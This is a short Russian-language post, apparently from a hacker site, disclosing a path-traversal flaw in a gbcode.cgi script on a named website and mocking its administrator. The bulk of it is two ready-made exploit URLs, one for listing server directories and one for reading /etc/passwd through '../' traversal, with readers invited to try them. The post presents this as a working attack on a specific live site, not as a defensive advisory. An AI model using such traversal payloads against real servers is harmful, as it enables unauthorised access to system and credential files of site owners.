Анализируя защиту сайта http://cgi-resource.co.uk
нашли уязвимость в скрипте gbcode.cgi. Никогда не видел такой «приятной дырочки» =))). Нет нет, я не о том. Вы поймете когда
испробуете сами. Вот как описывает админ скрипта свое детище: 

##################
#viewer script
#
#A small script to display the code of used from a page in different colours
#
#Code used could be shorter but I’m lazy!
#
##################

Не правда ли, трогательно… А баг скрипта вновь заключается в том что он позволяет просматривать
содержание любых директорий и файлы на сервере. Вот эксплоит

http://cgi-resource.co.uk/cgi-bin/gbcode.cgi?page=/ — Для чтения диреторий
http://cgi-resource.co.uk/cgi-bin/gbcode.cgi? page=/../../../../../../../../../../../../../…/../../../
etc/passwd — Для чтения файлов

Стоит обратить внимание на тематику сайта..=))
Ну вот собственно и все.



Оставить мнение